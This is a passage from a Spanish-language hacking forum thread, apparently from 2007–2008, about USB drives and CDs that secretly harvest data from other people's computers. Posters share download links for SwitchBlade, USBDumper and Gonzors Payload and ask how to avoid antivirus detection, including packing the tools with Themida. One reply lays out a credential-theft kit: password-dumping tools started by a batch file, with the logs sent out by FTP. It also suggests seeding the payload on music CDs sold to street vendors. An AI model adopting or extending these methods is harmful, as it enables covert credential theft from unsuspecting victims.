elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Ingresar Registrarse
13 Octubre 2008, 21:09  

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado (Moderadores: ANELKAOS, zhyzura)
| | |-+  Pendrive roba datos
Páginas: 1 [2] Ir Abajo Imprimir
Autor Tema: Pendrive roba datos  (Leído 11412 veces)
Джордж
Colaborador

Desconectado Desconectado

Ver Perfil
Re: Pendrive roba datos
« Respuesta #15 en: 19 Junio 2007, 22:42 »

Creo que todas las versiones de USB SwitchBlade son detectadas por los AV, por lo menos por el mio...

Tor

All you know is shit

Ver Perfil WWW
« Respuesta #16 en: 20 Junio 2007, 03:10 »

Funciona... tope de hardcore...

^^
wayzoken

wats sap men

Ver Perfil
« Respuesta #17 en: 25 Junio 2007, 00:00 »

estimado WHK me interesa en demasia la aplicacion la cualmencionas creadda por uds.
serias tan amable claro publicarla o enviarla  a mi correo [ANTISPAM]

esta aplicacion es justamente lo que necesito porque buscando por la red
me encontre con la que mencionan aca pero tiene limitaciones de hardware
lo del ( U3) ademas el " USBDumper  lo detectan lamayoria de los antivirus
otra limitacion estimado WHK sonn los privilegios que deben tenerce y tu aplicacion
soluciona estas desventaja.

sin ningun otra particular se despide
wayzoken
« Última modificación: 03 Julio 2007, 00:37 por ANELKAOS » En línea

odio a los gringos terroristas de eeuu
Lewert

Ver Perfil
« Respuesta #18 en: 02 Julio 2007, 22:23 »

No va ninguno de los links  :-\

Crack the bytes, crack your self
wayzoken

wats sap men

Ver Perfil
« Respuesta #19 en: 03 Julio 2007, 01:11 »

ya no los melesto mas ya que probando descubri (quisas todos sabian menos yo )
que los pendrive U3 tienen dentro una unidad que el pc los detecta como una unidad de cd pero la solucion mas simple es grabar esa imagen iso que viene con el programna con todos los archivos que se ejecutarran
y las otras partes guardarlas en el pendrive ( esos de 4 lukas en el persa bio-bio ) ja ja
y la funcion es casi la misma o lo otro es descomprimir la imagen iso en el pendrive y ejecutar directamente el archivo go.bat es mas sucio pero funciona

gracias
« Última modificación: 21 Febrero 2008, 10:26 por ANELKAOS » En línea

odio a los gringos terroristas de eeuu
WHK

+-=[Yan]=-+

Ver Perfil WWW
« Respuesta #20 en: 03 Julio 2007, 08:27 »

[offtopic]
guardarlas en el pendrive ( esos de 4 lukas en el persa bio-bio ) ja ja

Eres chileno!! jajaja k tal tocayo  :P me saludas al compadre de los juegos en el galpón de los computadores  :P
[/offtopic]

Mira... tomas todas las herramientas de nirsoft  :P mas algunos recuperadores de passwords y si te queda tiempo un reporte desde el pompt con everest corporate y lo metes todo en una carpeta y con un bat dentro que arranque todo...
Ahora puedes recolectar mas información por ejemplo usando el systeminfo.exe si es que no deseas usar el everest.
Puedes hacer esto mismo desde un CD pero adjuntas un winrar.exe de consola y guardas todos los logs en un solo archivo y te lo mandas por ftp: ftp -s:comandos.ini incluso hay una herramienta de nirsoft que te permite sacar el pass de la seción de usuario de su pc, mas todas las contraseñas mas increhibles, desde su contraseña de conexión via timofonica como accesos de redes wifi, y todo desde una cuenta de invitado... solo asegurate de poner esa descompresión sobre el directorio temporal de sobreescritura permitido: %tmp% o también %homepath% pero tmp es menos sospechoso.

Imagian crear un CD de algo que a todos les guste (ojala un CD de musica ya que de esta forma nadie ve nada) y lo ofreces a algún vendedor del persa bio bio  ;D mmmmm tu sabes lo que vuelan esos CDs en el bio no? Hace mucho tiempo lo usaba para poder conectarme con la conexión de terra... recuerdas? esa que aparece en las amarillas en la tapa de atras  :P pero con las contraseñas me conectaba a las de pago sin dar ni un duro.

Compaire.. craneesela solito y busque un pokito mas porque tu ya cachai que los chilenos somos como giles para buscarla o me ekioboco?
Cacha!.. tení el bio y el perza de zapadores  ;D que más.

Ademas no le doy mas de un dia de vida a este post jajajajaja.

[offtopic]
esos de 4 lukas en el persa bio-bio
Adonde la viste que valen 4 lucas jajaja el mas barato está como a 10.000 y ni eso.
Ahora si llegas en la mañanita bien temprano ahi si te creo que encuentras hasta por una luca jajajaja imagina un wn vendiendo las palm en 10 lucas con 10 gigas... tu ya cachai de donde vienen  ;D
[/offtopic]
« Última modificación: 21 Febrero 2008, 10:29 por ANELKAOS » En línea

* The Hacktivism is not a crimen.
* Dios nos hace libres en el mundo real y el Hacking nos hace libres en el mundo de la informática.
http://solid.jccharry.com/
Greencode by WHK
danielitto

Ver Perfil
« Respuesta #21 en: 10 Julio 2007, 22:36 »

alguna herramienta para PC roba info de cualquier cd al insertalo
Snake-Saks

Ver Perfil
« Respuesta #22 en: 07 Agosto 2007, 07:51 »

hola decript pues yo me baje esta version

http://www.valgasu.org/tools/USBDumper2.zip y me va muy bien no la detecta mi antivirus AVG al igual que tambien tengo esta version del SwitchBlade y no la detecta mi antivirus http://rapidshare.com/files/36419370/GonZors_SwitchBlade-V1.2.zip
Snake-Saks

Ver Perfil
« Respuesta #23 en: 07 Agosto 2007, 08:51 »

este  tambien sirve  para copiar toda la informacion de CD (musica,videos,documenyos que contenga el cd) al incertarlo
http://www.valgasu.org/tools/USBDumper2.zip
boomboomkid

Ver Perfil
« Respuesta #24 en: 24 Diciembre 2007, 17:57 »

hola! miren desde la pagina que dejo no puedo bajar ninguno :S ni el siliverion ni el kapowdude ni el Amish que es q mas quiero porq tengo un pendrive normal y no un U3, los dos primeros ni si quiera m abren y el Amish me da a una pagina con un monton de simbolos -_-... si m ayudan les doy las gracias=) ;)
Zedmix

B*A

Ver Perfil
« Respuesta #25 en: 02 Enero 2008, 23:23 »

lo uso bastante desde hace mucho tiempo y la verdad es que me va muy bien me he inchado xD. os lo recomiendo, por que ademas es muy discreto.

Saludos

Conciencia, Compromiso, Rebeldia y Solidaridad

mio1234

Ver Perfil
« Respuesta #26 en: 05 Enero 2008, 21:15 »

Hola keria saber si esto funcionaria en un usb al que se le mete una tarjeta micro sd de un movil  . Gracias de antemano .
jackl007 ツ

IP GMailer

Ver Perfil WWW
« Respuesta #27 en: 05 Enero 2008, 22:02 »

¿Cómo se podría poner para que los archivos no se vieran  aún estando ocultos?, puesto que si el sistema tiene activado la opoción de mostrar los ficheros ocultos pues se verían todos, ¿y como pongo para que se abra normalmente? , si alguien ha probado alguna otra tecnica que diga que tal le ha ido.

debes colocarlos como ocultos y de sistema (solo se veran si es que tiene puesta la casilla 'ver archivos del sistema' ... (muy poco probable).
yo hice un programa para lograr esto ::)
si lo quieres me mandas un MP y te lo mando.

Creete HACKER cuando hagas cosas como Kevin Mitnick ...
dioms

Ver Perfil
« Respuesta #28 en: 28 Febrero 2008, 04:43 »

Les recomiendo Gonzors Payload, puede installar VNC con solo meter el pendrive, sirve en los U3 y los normales. Perdon pero esta en ingles :S
¹4¹²

Ver Perfil
« Respuesta #29 en: 06 Junio 2008, 14:15 »

a mi no me rula.. :-\ el antivirus del otro pc me lo detecta. Si se encripta cn el themida o alguno de eso programas,se perdera alguna de las funciones?
SAlu2

...El Ladrón es un artista creativo capaz de crear robos asombrosos, mientras que el Detective se dedica a reconstruir su trabajo; lo que lo convierte en un mero crítico...
Páginas: 1 [2] Ir Arriba Imprimir 
Ir a:  

Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.